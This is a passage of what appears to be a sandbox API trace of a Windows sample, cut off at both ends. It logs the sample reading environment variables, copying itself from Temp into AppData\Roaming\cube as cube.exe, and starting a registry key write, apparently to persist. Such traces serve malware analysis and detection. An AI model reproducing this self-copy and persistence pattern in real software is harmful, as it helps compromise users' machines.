RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x48) returned 0xca9648 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x52) returned 0xcbd718 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3c) returned 0xca2228 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0xd6) returned 0xcbcfb0 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2e) returned 0xcadd70 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1e) returned 0xcb8f40 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2c) returned 0xcbe718 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x54) returned 0xcbd778 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x52) returned 0xcbd7d8 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2c) returned 0xcbe750 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x26) returned 0xcad438 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3e) returned 0xca2270 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x24) returned 0xcad468 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x30) returned 0xcbe788 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x8c) returned 0xcbef00 [0287.058] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xca2198 | out: hHeap=0xc90000) returned 1 [0287.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad948, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0287.058] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x56) returned 0xcbd838 [0287.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad948, cbMultiByte=-1, lpWideCharStr=0xcbd838, cchWideChar=43 | out: lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 43 [0287.058] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd6b8 | out: hHeap=0xc90000) returned 1 [0287.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc92958, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0287.058] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x6e) returned 0xcbd090 [0287.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc92958, cbMultiByte=-1, lpWideCharStr=0xcbd090, cchWideChar=55 | out: lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files") returned 55 [0287.059] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb398 | out: hHeap=0xc90000) returned 1 [0287.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca1f10, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0287.059] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x78) returned 0xc9fe60 [0287.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca1f10, cbMultiByte=-1, lpWideCharStr=0xc9fe60, cchWideChar=60 | out: lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files") returned 60 [0287.059] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xc9fde0 | out: hHeap=0xc90000) returned 1 [0287.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0287.059] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x62) returned 0xcbb398 [0287.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8188, cbMultiByte=-1, lpWideCharStr=0xcbb398, cchWideChar=49 | out: lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files") returned 49 [0287.059] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb410 | out: hHeap=0xc90000) returned 1 [0287.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc92810, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0287.059] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x30) returned 0xcbe7c0 [0287.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc92810, cbMultiByte=-1, lpWideCharStr=0xcbe7c0, cchWideChar=24 | out: lpWideCharStr="COMPUTERNAME=Q9IATRKPRH") returned 24 [0287.060] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcadcc8 | out: hHeap=0xc90000) returned 1 [0287.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad2b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0287.060] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x48) returned 0xca9698 [0287.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad2b8, cbMultiByte=-1, lpWideCharStr=0xca9698, cchWideChar=36 | out: lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe") returned 36 [0287.060] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xca95f8 | out: hHeap=0xc90000) returned 1 [0287.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb81c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0287.060] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x28) returned 0xcad498 [0287.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb81c8, cbMultiByte=-1, lpWideCharStr=0xcad498, cchWideChar=20 | out: lpWideCharStr="FP_NO_HOST_CHECK=NO") returned 20 [0287.060] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcad3d8 | out: hHeap=0xc90000) returned 1 [0287.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca4a40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0287.060] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1a) returned 0xcb8f68 [0287.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca4a40, cbMultiByte=-1, lpWideCharStr=0xcb8f68, cchWideChar=13 | out: lpWideCharStr="HOMEDRIVE=C:") returned 13 [0287.060] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb8ef0 | out: hHeap=0xc90000) returned 1 [0287.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0287.060] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x34) returned 0xcbc008 [0287.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8058, cbMultiByte=-1, lpWideCharStr=0xcbc008, cchWideChar=26 | out: lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj") returned 26 [0287.061] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb480 | out: hHeap=0xc90000) returned 1 [0287.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad980, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0287.061] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x5c) returned 0xcbb410 [0287.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad980, cbMultiByte=-1, lpWideCharStr=0xcbb410, cchWideChar=46 | out: lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local") returned 46 [0287.061] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb4c0 | out: hHeap=0xc90000) returned 1 [0287.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8080, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0287.061] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x32) returned 0xcbc048 [0287.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8080, cbMultiByte=-1, lpWideCharStr=0xcbc048, cchWideChar=25 | out: lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH") returned 25 [0287.061] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb528 | out: hHeap=0xc90000) returned 1 [0287.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb81e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0287.061] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2e) returned 0xcadcc8 [0287.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb81e8, cbMultiByte=-1, lpWideCharStr=0xcadcc8, cchWideChar=23 | out: lpWideCharStr="NUMBER_OF_PROCESSORS=1") returned 23 [0287.061] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcadd00 | out: hHeap=0xc90000) returned 1 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca4a58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0287.062] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1c) returned 0xcb8ef0 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca4a58, cbMultiByte=-1, lpWideCharStr=0xcb8ef0, cchWideChar=14 | out: lpWideCharStr="OS=Windows_NT") returned 14 [0287.062] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb8f18 | out: hHeap=0xc90000) returned 1 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8208, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 149 [0287.062] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x12a) returned 0xcbd108 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8208, cbMultiByte=-1, lpWideCharStr=0xcbd108, cchWideChar=149 | out: lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 149 [0287.062] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb568 | out: hHeap=0xc90000) returned 1 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca1f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0287.062] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x7c) returned 0xcbb478 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca1f58, cbMultiByte=-1, lpWideCharStr=0xcbb478, cchWideChar=62 | out: lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 62 [0287.062] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbe5e0 | out: hHeap=0xc90000) returned 1 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb80a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0287.062] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x36) returned 0xcbc088 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb80a8, cbMultiByte=-1, lpWideCharStr=0xcbc088, cchWideChar=27 | out: lpWideCharStr="PROCESSOR_ARCHITECTURE=x86") returned 27 [0287.062] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb6a0 | out: hHeap=0xc90000) returned 1 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb80d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0287.062] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3a) returned 0xca2198 [0287.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb80d0, cbMultiByte=-1, lpWideCharStr=0xca2198, cchWideChar=29 | out: lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64") returned 29 [0287.063] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xca21e0 | out: hHeap=0xc90000) returned 1 [0287.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca94b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0287.063] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x90) returned 0xcbb500 [0287.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca94b8, cbMultiByte=-1, lpWideCharStr=0xcbb500, cchWideChar=72 | out: lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel") returned 72 [0287.063] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbe668 | out: hHeap=0xc90000) returned 1 [0287.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb82a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0287.063] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x24) returned 0xcad3d8 [0287.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb82a8, cbMultiByte=-1, lpWideCharStr=0xcad3d8, cchWideChar=18 | out: lpWideCharStr="PROCESSOR_LEVEL=6") returned 18 [0287.063] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcad408 | out: hHeap=0xc90000) returned 1 [0287.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb82c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0287.063] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x30) returned 0xcadd00 [0287.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb82c8, cbMultiByte=-1, lpWideCharStr=0xcadd00, cchWideChar=24 | out: lpWideCharStr="PROCESSOR_REVISION=5504") returned 24 [0287.063] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcadd38 | out: hHeap=0xc90000) returned 1 [0287.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb80f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0287.063] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x36) returned 0xcbc0c8 [0287.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb80f8, cbMultiByte=-1, lpWideCharStr=0xcbc0c8, cchWideChar=27 | out: lpWideCharStr="ProgramData=C:\\ProgramData") returned 27 [0287.064] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbbfc8 | out: hHeap=0xc90000) returned 1 [0287.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad2e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0287.064] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x48) returned 0xca95f8 [0287.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad2e8, cbMultiByte=-1, lpWideCharStr=0xca95f8, cchWideChar=36 | out: lpWideCharStr="ProgramFiles=C:\\Program Files (x86)") returned 36 [0287.064] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xca9648 | out: hHeap=0xc90000) returned 1 [0287.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad9b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0287.064] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x52) returned 0xcbd6b8 [0287.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad9b8, cbMultiByte=-1, lpWideCharStr=0xcbd6b8, cchWideChar=41 | out: lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)") returned 41 [0287.064] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd718 | out: hHeap=0xc90000) returned 1 [0287.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8120, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0287.064] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3c) returned 0xca21e0 [0287.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8120, cbMultiByte=-1, lpWideCharStr=0xca21e0, cchWideChar=30 | out: lpWideCharStr="ProgramW6432=C:\\Program Files") returned 30 [0287.064] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xca2228 | out: hHeap=0xc90000) returned 1 [0287.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb82e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0287.064] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0xd6) returned 0xcbe5e0 [0287.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb82e8, cbMultiByte=-1, lpWideCharStr=0xcbe5e0, cchWideChar=107 | out: lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 107 [0287.064] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbcfb0 | out: hHeap=0xc90000) returned 1 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8360, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0287.065] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2e) returned 0xcadd38 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8360, cbMultiByte=-1, lpWideCharStr=0xcadd38, cchWideChar=23 | out: lpWideCharStr="PUBLIC=C:\\Users\\Public") returned 23 [0287.065] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcadd70 | out: hHeap=0xc90000) returned 1 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca4a70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0287.065] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1e) returned 0xcb8f18 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca4a70, cbMultiByte=-1, lpWideCharStr=0xcb8f18, cchWideChar=15 | out: lpWideCharStr="SystemDrive=C:") returned 15 [0287.065] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb8f40 | out: hHeap=0xc90000) returned 1 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8380, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0287.065] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2c) returned 0xcadd70 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8380, cbMultiByte=-1, lpWideCharStr=0xcadd70, cchWideChar=22 | out: lpWideCharStr="SystemRoot=C:\\Windows") returned 22 [0287.065] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbe718 | out: hHeap=0xc90000) returned 1 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad9f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0287.065] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x54) returned 0xcbd718 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcad9f0, cbMultiByte=-1, lpWideCharStr=0xcbd718, cchWideChar=42 | out: lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 42 [0287.065] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd778 | out: hHeap=0xc90000) returned 1 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcada28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0287.065] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x52) returned 0xcbd778 [0287.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcada28, cbMultiByte=-1, lpWideCharStr=0xcbd778, cchWideChar=41 | out: lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 41 [0287.066] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbd7d8 | out: hHeap=0xc90000) returned 1 [0287.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb83a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0287.066] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2c) returned 0xcbe718 [0287.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb83a0, cbMultiByte=-1, lpWideCharStr=0xcbe718, cchWideChar=22 | out: lpWideCharStr="USERDOMAIN=Q9IATRKPRH") returned 22 [0287.066] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbe750 | out: hHeap=0xc90000) returned 1 [0287.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb83c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0287.066] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x26) returned 0xcad408 [0287.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb83c0, cbMultiByte=-1, lpWideCharStr=0xcad408, cchWideChar=19 | out: lpWideCharStr="USERNAME=kEecfMwgj") returned 19 [0287.066] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcad438 | out: hHeap=0xc90000) returned 1 [0287.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0287.066] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3e) returned 0xca2228 [0287.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8148, cbMultiByte=-1, lpWideCharStr=0xca2228, cchWideChar=31 | out: lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj") returned 31 [0287.066] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xca2270 | out: hHeap=0xc90000) returned 1 [0287.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb83f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0287.066] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x24) returned 0xcad438 [0287.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb83f8, cbMultiByte=-1, lpWideCharStr=0xcad438, cchWideChar=18 | out: lpWideCharStr="windir=C:\\Windows") returned 18 [0287.067] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcad468 | out: hHeap=0xc90000) returned 1 [0287.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8418, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0287.067] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x30) returned 0xcbe750 [0287.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8418, cbMultiByte=-1, lpWideCharStr=0xcbe750, cchWideChar=24 | out: lpWideCharStr="windows_tracing_flags=3") returned 24 [0287.067] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbe788 | out: hHeap=0xc90000) returned 1 [0287.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca9508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0287.067] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x8c) returned 0xcbcfb0 [0287.067] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xca9508, cbMultiByte=-1, lpWideCharStr=0xcbcfb0, cchWideChar=70 | out: lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log") returned 70 [0287.067] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbef00 | out: hHeap=0xc90000) returned 1 [0287.067] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x50) returned 0xcbef00 [0287.067] GetLongPathNameW (in: lpszShortPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpszLongPath=0x18f9b8, cchBuffer=0x208 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x22 [0287.069] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x50) returned 0xcbef58 [0287.069] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbef00 | out: hHeap=0xc90000) returned 1 [0287.071] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cube" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cube"), lpSecurityAttributes=0x0) returned 1 [0287.075] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x60) returned 0xcbb598 [0287.075] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x8e) returned 0xcbb600 [0287.075] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb598 | out: hHeap=0xc90000) returned 1 [0287.075] CopyFileW (lpExistingFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cube\\cube.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cube\\cube.exe"), bFailIfExists=0) returned 1 [0289.064] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x70) returned 0xcbd240 [0289.065] RegCreateKeyW (in: hKey=0x80000001, 